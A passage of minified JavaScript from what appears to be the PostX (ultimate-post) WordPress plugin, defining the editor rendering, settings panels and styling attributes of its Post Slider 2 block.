Block"),(0,o.createElement)("a",{className:"ultp-upgrade-pro",href:ct,target:"_blank",rel:"noreferrer"}," ","Upgrade to Pro"," "),(0,o.createElement)("a",{href:"https://www.wpxpo.com/postx/blocks/#demoid7487",target:"_blank",rel:"noreferrer"}," ","View Demo"))),function(){const e=`${Pe}`,t={arrows:$,dots:J,autoplay:X,infinite:!0,cssEase:"linear",speed:500,autoplaySpeed:parseInt(Y),nextArrow:(0,o.createElement)((e=>{const{className:t,onClick:l}=e,a=q.split("#");return(0,o.createElement)("div",{className:t,onClick:e=>{rt(e,l)}},w.ZP[a[1]])}),null),prevArrow:(0,o.createElement)((e=>{const{className:t,onClick:l}=e,a=q.split("#");return(0,o.createElement)("div",{className:t,onClick:e=>{rt(e,l)}},w.ZP[a[0]])}),null)},r="slide2"==Ze||"slide3"==Ze||"slide5"==Ze||"slide6"==Ze||"slide8"==Ze,g=parseInt(Ne.lg)?parseInt(Ne.lg):1,h=parseInt(Ne.sm)?parseInt(Ne.sm):1,f=parseInt(Ne.xs)?parseInt(Ne.xs):1;if(K&&r)t.slidesToShow=1,t.fade=K;else if(!K&&r)t.slidesToShow=g,t.responsive=[{breakpoint:991,settings:{slidesToShow:h,slidesToScroll:1}},{breakpoint:767,settings:{slidesToShow:f,slidesToScroll:1}}];else{const e=wp.data.select("core/editor").getDeviceType?.()||wp.data.select(wp.data.select("core/edit-site")?"core/edit-site":"core/edit-post").__experimentalGetPreviewDeviceType();t.centerMode=!0,"Tablet"==e?(t.slidesToShow=h,t.centerPadding=Ve.sm?Ve.sm+"px":"50px"):"Mobile"==e?(t.slidesToShow=f,t.centerPadding=Ve.xs?Ve.xs+"px":"100px"):(t.slidesToShow=g,t.centerPadding=Ve.lg?Ve.lg+"px":"100px"),t.responsive=[{breakpoint:991,settings:{slidesToShow:h,slidesToScroll:1,centerPadding:Ve.sm?Ve.sm+"px":"100px"}},{breakpoint:767,settings:{slidesToShow:f,slidesToScroll:1,centerPadding:Ve.xs?Ve.xs+"px":"50px"}}]}t.appendDots=e=>(0,o.createElement)("div",{onClick:e=>function(e){e.stopPropagation(),at("dot"),it("dot")}(e)},(0,o.createElement)("ul",null," ",e," "));const k=(0,n.fk)(t),x=(e,t)=>(0,y.o6)()&&Ke&&(0,o.createElement)(v.Z,{idx:e,postId:t,fields:Je,settingsOnClick:(e,t)=>{e?.stopPropagation(),it(t)},selectedDC:l.selectedDC,setSelectedDc:lt,setAttributes:N,dcFields:Je});return l.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-slide-${Ze} ${ultp_data.active?"":" ultp-wrapper-pro"}`},(0,o.createElement)("div",{onClick:e=>{e.preventDefault(),at("heading"),it("heading")}},(0,o.createElement)(i.Z,{props:{headingShow:de,headingStyle:me,headingAlign:ge,headingURL:ye,headingText:be,setAttributes:N,headingBtnText:ve,subHeadingShow:he,subHeadingText:fe,headingTag:qe}})),(0,o.createElement)(a.Z,k,l.postsList.map(((t,l)=>{const a=JSON.parse(ce.replaceAll("u0022",'"'));return(0,o.createElement)(e,{key:l,className:`ultp-block-item post-id-${t.ID}`},(0,o.createElement)("div",{className:"ultp-block-slider-wrap"},(0,o.createElement)("div",{className:"ultp-block-image-inner"},(t.image&&!t.is_fallback||Ge)&&(0,o.createElement)(c.xj,{imgOverlay:we,imgOverlayType:xe,post:t,fallbackEnable:Ge,idx:l,imgCrop:V,onClick:()=>{}})),(0,o.createElement)(c.UU,{contentHorizontalPosition:_e,contentVerticalPosition:Te,onClick:e=>{e.stopPropagation(),at("image"),it("image")}},(0,o.createElement)("div",{className:"ultp-block-content-inner"},x(7,t.ID),(0,o.createElement)(s.Z,{post:t,catShow:oe,catStyle:ne,catPosition:re,customCatColor:Ee,onlyCatColor:Se,onClick:e=>{at("taxonomy-/-category"),it("cat")}}),x(6,t.ID),t.title&&ie&&1==se&&(0,o.createElement)(m.Z,{title:t.title,headingTag:Le,titleLength:Be,titleStyle:Ae,onClick:e=>{at("title"),it("title")}}),x(5,t.ID),ue&&"top"==ke&&(0,o.createElement)(u.Z,{meta:a,post:t,metaSeparator:ae,metaStyle:le,metaMinText:Ue,metaAuthorPrefix:Me,metaDateFormat:He,authorLink:je,onClick:e=>{at("meta"),it("meta")}}),x(4,t.ID),t.title&&ie&&0==se&&(0,o.createElement)(m.Z,{title:t.title,headingTag:Le,titleLength:Be,titleStyle:Ae,onClick:e=>{at("title"),it("title")}}),x(3,t.ID),pe&&(0,o.createElement)(p.Z,{excerpt:t.excerpt,excerpt_full:t.excerpt_full,seo_meta:t.seo_meta,excerptLimit:te,showFullExcerpt:Ce,showSeoMeta:Ie,onClick:e=>{at("excerpt"),it("excerpt")}}),x(2,t.ID),Q&&(0,o.createElement)(d.Z,{readMoreText:ee,readMoreIcon:G,titleLabel:t.title,onClick:()=>{at("read-more"),it("read-more")}}),x(1,t.ID),ue&&"bottom"==ke&&(0,o.createElement)(u.Z,{meta:a,post:t,metaSeparator:ae,metaStyle:le,metaMinText:Ue,metaAuthorPrefix:Me,metaDateFormat:He,authorLink:je,onClick:e=>{at("meta"),it("meta")}}),x(0,t.ID),(0,y.o6)()&&Ke&&(0,o.createElement)(b.Z,{dcFields:Je,setAttributes:N,startOnboarding:ot})))))})))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:$e})}())))}},34047:(e,t,l)=>{"use strict";l.d(t,{FP:()=>b,PR:()=>g,ZP:()=>y});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(69735),p=l(82473),c=l(87282),u=l(92637),d=l(43581),m=l(50814);const{__}=wp.i18n,g=8;function y({store:e}){const{section:t,settingTab:l,setSettingTab:n}=e,{V4_1_0_CompCheck:{runComp:r}}=e.attributes;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(d.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid7487",store:e}),(0,o.createElement)(u.Sections,{settingTab:l,setSettingTab:n},(0,o.createElement)(u.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:e}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Include","ultimate-post"),include:c.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Exclude","ultimate-post"),include:c.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(u.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{initialOpen:t.general,store:e,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:0,data:{type:"layout",block:"post-slider-2",key:"layout",exclude:["blockPubDate"],label:__("Slider Layout","ultimate-post"),options:[{img:"assets/img/layouts/slider2/layout1.png",label:__("Slide 1","ultimate-post"),value:"slide1"},{img:"assets/img/layouts/slider2/layout2.png",label:__("Slide 2","ultimate-post"),value:"slide2"},{img:"assets/img/layouts/slider2/layout3.png",label:__("Slide 3","ultimate-post"),value:"slide3"},{img:"assets/img/layouts/slider2/layout4.png",label:__("Slide 4","ultimate-post"),value:"slide4"},{img:"assets/img/layouts/slider2/layout5.png",label:__("Slide 5","ultimate-post"),value:"slide5"},{img:"assets/img/layouts/slider2/layout6.png",label:__("Slide 6","ultimate-post"),value:"slide6"},{img:"assets/img/layouts/slider2/layout7.png",label:__("Slide 7","ultimate-post"),value:"slide7"},{img:"assets/img/layouts/slider2/layout8.png",label:__("Slide 8","ultimate-post"),value:"slide8"}],variation:m.P}},{position:3,data:{type:"range",key:"slidesToShow",min:1,max:8,step:1,responsive:!0,label:__("Number of Slide","ultimate-post")}},{position:4,data:{type:"range",key:"height",label:__("Height","ultimate-post"),min:0,max:1e3,step:1,unit:!0,responsive:!0}},{position:5,data:{type:"range",key:"slidesCenterPadding",min:1,max:400,step:1,responsive:!0,label:__("Padding ( Center Mode )","ultimate-post")}},{position:6,data:{type:"range",key:"slidesTopPadding",min:0,max:150,step:1,label:__("Padding ( Top & Bottom )","ultimate-post")}},{position:7,data:{type:"range",key:"allItemScale",min:0,max:2.5,step:.01,responsive:!0,unit:!1,label:__("All Item Scale ( Center Mode )","ultimate-post")}},{position:8,data:{type:"range",key:"centerItemScale",min:0,max:2.5,step:.01,responsive:!0,unit:!1,label:__("Center Item Scale ( Center Mode )","ultimate-post")}},{position:9,data:{type:"range",key:"slideSpeed",min:0,max:1e4,step:100,label:__("Slide Speed","ultimate-post")}},{position:10,data:{type:"range",key:"sliderGap",min:-5,max:100,label:__("Slider Gap","ultimate-post")}},{position:11,data:{type:"toggle",key:"fade",label:__("Animation Fade","ultimate-post")}},{position:12,data:{type:"toggle",key:"autoPlay",label:__("Auto Play","ultimate-post")}},{position:13,data:{type:"toggle",key:"dots",label:__("Dots","ultimate-post")}},{position:14,data:{type:"toggle",key:"arrows",label:__("Arrows","ultimate-post")}},{position:15,data:{type:"toggle",key:"preLoader",label:__("Pre Loader","ultimate-post")}}],exclude:["columns","columnGridGap"]}),(0,o.createElement)(a.VH,{isTab:!0,store:e,depend:"titleShow",initialOpen:t.title,hrIdx:[4,9]}),(0,o.createElement)(a.Hn,{isTab:!0,store:e,initialOpen:t.image,include:[{position:3,data:{type:"range",key:"imgBgBlur",min:0,max:20,step:.5,responsive:!1,label:__("Background Blur","ultimate-post")}},{position:4,data:{type:"range",key:"imgBgbrightness",min:0,max:50,step:.5,responsive:!1,label:__("Background brightness","ultimate-post")}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imageScale","imgMargin","imgSeparator","imgCropSmall","imgAnimation"],hrIdx:[{tab:"settings",hr:[1,9]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:e,depend:"metaShow",initialOpen:t.meta,exclude:["metaListSmall"],hrIdx:[{tab:"settings",hr:[]},{tab:"style",hr:[2,8]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:t["taxonomy-/-category"],depend:"catShow",store:e,exclude:["catPosition"],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.oY,{isTab:!0,store:e,initialOpen:t["read-more"],depend:"readMore"}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:t.excerpt,store:e,hrIdx:[3,6]}),(0,o.createElement)(a.tf,{depend:"arrows",store:e,initialOpen:t.arrow,include:[{position:5,data:{type:"separator",key:"separatorStyle",label:__("Arrow Position","ultimate-post")}},{position:6,data:{type:"toggle",key:"arrowSpaceBetween",label:__("Arrow Space Between","ultimate-post")}},{position:7,data:{type:"range",key:"arrowPosBetween",min:1,max:1500,step:1,responsive:!0,label:__("Arrow Position","ultimate-post")}},{position:8,data:{type:"tag",key:"arrowPos",label:"Arrow Possition",disabled:!0,options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}},{position:9,data:{type:"range",key:"prevArrowPos",min:1,max:1500,step:1,responsive:!0,label:__("Previous Arrow Position","ultimate-post")}},{position:10,data:{type:"range",key:"nextArrowPos",min:1,max:1500,step:1,responsive:!0,label:__("Next Arrow Position","ultimate-post")}}]}),(0,o.createElement)(a.H_,{depend:"dots",store:e,initialOpen:t.dot}),(0,o.createElement)(a.O2,{store:e,exclude:["contentWrapInnerPadding"],include:[{position:0,data:{type:"tag",key:"contentVerticalPosition",label:"Vertical Position",disabled:!0,options:[{value:"topPosition",label:__("Top","ultimate-post")},{value:"middlePosition",label:__("Middle","ultimate-post")},{value:"bottomPosition",label:__("Bottom","ultimate-post")}]}},{position:1,data:{type:"tag",key:"contentHorizontalPosition",label:__("Horizontal Position","ultimate-post"),disabled:!0,options:[{value:"leftPosition",label:__("Left","ultimate-post")},{value:"centerPosition",label:__("Center","ultimate-post")},{value:"rightPosition",label:__("Right","ultimate-post")}]}},{position:2,data:{type:"separator"}},{position:4,data:{type:"range",key:"slideBgBlur",min:0,max:20,step:1,responsive:!1,label:__("Background Blur","ultimate-post")}},{position:7,data:{type:"dimension",key:"slideWrapMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),!r&&(0,o.createElement)(i.Z,{open:t.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:e,initialOpen:t.heading,depend:"headingShow"}))),(0,o.createElement)(u.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}function b({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,titleShow:c,titlePosition:u,excerptShow:d,readMore:m,metaPosition:g,catShow:y}=t.attributes,b=[i&&"bottom"==g,m,d,c&&0==u,i&&"top"==g,c&&1==u,y];if((0,s.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(p.Z,{store:t,selected:e,layoutContext:b});switch(e){case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"arrow":return(0,o.createElement)(r.Z,{text:"Arrow"},(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.fA)({include:a.I0,exclude:"__all",title:__("Arrow Dimension","ultimate-post")}),store:t,label:__("Arrow Dimension","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.YG,include:(0,a.fA)({title:__("Arrow Style","ultimate-post"),exclude:["separatorStyle",...a.I0],include:[{data:{type:"tag",key:"arrowPos",label:"Arrow Possition",disabled:!0,options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}},{data:{type:"range",key:"prevArrowPos",min:1,max:1500,step:1,responsive:!0,label:__("Previous Arrow Position","ultimate-post")}},{data:{type:"range",key:"nextArrowPos",min:1,max:1500,step:1,responsive:!0,label:__("Next Arrow Position","ultimate-post")}}]}),store:t,label:__("Arrow Style","ultimate-post")}));case"dot":return(0,o.createElement)(r.Z,{text:"Dots"},(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.oc)({include:a.EG,exclude:"__all",title:__("Dots Dimension","ultimate-post")}),store:t,label:__("Dots Dimension","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.YG,include:(0,a.oc)({title:__("Dots Settings","ultimate-post"),exclude:["separatorStyle",...a.EG]}),store:t,label:__("Dots Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(a.sT,{store:t,attrKey:"titleTypo",label:__("Title Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor","titleBackground"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exSettings:["catPosition"],exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,exSettings:["imageScale","imgMargin","imgSeparator","imgCropSmall","imgAnimation"],exStyle:["imageScale","imgMargin","imgSeparator","imgCropSmall","imgAnimation"],incStyle:[{position:0,data:{type:"range",key:"imgBgBlur",min:0,max:20,step:.5,responsive:!1,label:__("Background Blur","ultimate-post")}},{position:1,data:{type:"range",key:"imgBgbrightness",min:0,max:50,step:.5,responsive:!1,label:__("Background brightness","ultimate-post")}}],incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}]}));default:return null}}},22105:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockPubDate:{type:"string",default:"empty"},blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},slidesToShow:{type:"object",default:{lg:"1",sm:"1",xs:"1"},style:[{depends:[{key:"fade",condition:"!=",value:!0},{key:"layout",condition:"==",value:"slide2"}]},{depends:[{key:"layout",condition:"==",value:"slide3"}]}]},autoPlay:{type:"boolean",default:!0},height:{type:"object",default:{lg:"550",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-slider-wrap { height: {{height}}; }"}]},slidesCenterPadding:{type:"object",default:{lg:"160",sm:"100",xs:"50"},style:[{depends:[{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"},{key:"layout",condition:"!=",value:"slide5"},{key:"layout",condition:"!=",value:"slide6"},{key:"layout",condition:"!=",value:"slide8"}]}]},slidesTopPadding:{type:"string",default:"0",style:[{depends:[{key:"layout",condition:"!=",value:"slide1"},{key:"layout",condition:"!=",value:"slide2"},{key:"layout",condition:"!=",value:"slide3"},{key:"layout",condition:"!=",value:"slide5"},{key:"layout",condition:"!=",value:"slide6"},{key:"layout",condition:"!=",value:"slide8"}],selector:"{{ULTP}} .ultp-block-items-wrap .slick-list { padding-top: {{slidesTopPadding}}px !important; padding-bottom: {{slidesTopPadding}}px !important; }"}]},allItemScale:{type:"object",default:{lg:".9"},style:[{depends:[{key:"layout",condition:"==",value:"slide4"}],selector:"{{ULTP}} .slick-slide { transition: .3s; transform: scale({{allItemScale}}) }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .slick-slide { transition: .3s; transform: scale({{allItemScale}}) }"}]},centerItemScale:{type:"object",default:{lg:"1.12"},style:[{depends:[{key:"layout",condition:"==",value:"slide4"}],selector:"{{ULTP}} .slick-center { transition: .3s; transform: scale({{centerItemScale}}) !important; }"},{depends:[{key:"layout",condition:"==",value:"slide7"}],selector:"{{ULTP}} .slick-center { transition: .3s; transform: scale({{centerItemScale}}) !important; }"}]},slideSpeed:{type:"string",default:"3000",style:[{depends:[{key:"autoPlay",condition:"==",value:!0}]}]},sliderGap:{type:"string",default:"",style:[{depends:[{key:"layout",condition:"!=",value:"slide2"}],selector:"{{ULTP}} .ultp-block-items-wrap .slick-slide > div { padding: 0 {{sliderGap}}px; }\n          {{ULTP}} .ultp-block-items-wrap .slick-list{ margin: 0 -{{sliderGap}}px; }"}]},dots:{type:"boolean",default:!0},arrows:{type:"boolean",default:!0},preLoader:{type:"boolean",default:!1},fade:{type:"boolean",default:!1,style:[{depends:[{key:"layout",condition:"==",value:"slide2"}]},{depends:[{key:"layout",condition:"==",value:"slide5"}]},{depends:[{key:"layout",condition:"==",value:"slide6"}]},{depends:[{key:"layout",condition:"==",value:"slide8"}]}]},headingShow:{type:"boolean",default:!1},excerptShow:{type:"boolean",default:!1},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},layout:{type:"string",default:"slide1"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleTag:{type:"string",default:"h3"},titlePosition:{type:"boolean",default:!0},titleColor:{type:"string",default:"#fff",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a { color:{{titleColor}} !important; }"}]},titleHoverColor:{type:"string",default:"rgba(107,107,107,1)",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-items-wrap .ultp-block-item .ultp-block-title a:hover { color:{{titleHoverColor}} !important; }"}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:"24",unit:"px"},height:{lg:"36",unit:"px"},decoration:"none",family:"",weight:"300",transform:"uppercase"},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item .ultp-block-content .ultp-block-title, \n          {{ULTP}} .ultp-block-item .ultp-block-content .ultp-block-title a"}]},titlePadding:{type:"object",default:{lg:{top:0,bottom:0,unit:"px"}},style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title { padding:{{titlePadding}}; }"}]},titleLength:{type:"string",default:0},titleBackground:{type:"string",default:"",style:[{depends:[{key:"titleShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-title a { padding: 2px 7px; -webkit-box-decoration-break: clone; box-decoration-break: clone; background-color:{{titleBackground}}; }"}]},titleAnimColor:{type:"string",default:"black",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover { text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); } "},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style6"}],selector:"{{ULTP}} .ultp-title-style6 a { background-image: linear-gradient(120deg, {{titleAnimColor}} 0%, {{titleAnimColor}} 100%); background-repeat: no-repeat; background-size: 100% 2px; background-position: 0 88%; transition: background-size 0.15s ease-in; padding: 5px 5px; }"},{depends:[{key:"titleStyle",condition:"==",value:"style7"}],selector:"{{ULTP}} .ultp-title-style7 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: right 100%; } "},{depends:[{key:"titleStyle",condition:"==",value:"style8"}],selector:"{{ULTP}} .ultp-title-style8 a { cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: center 100%; } 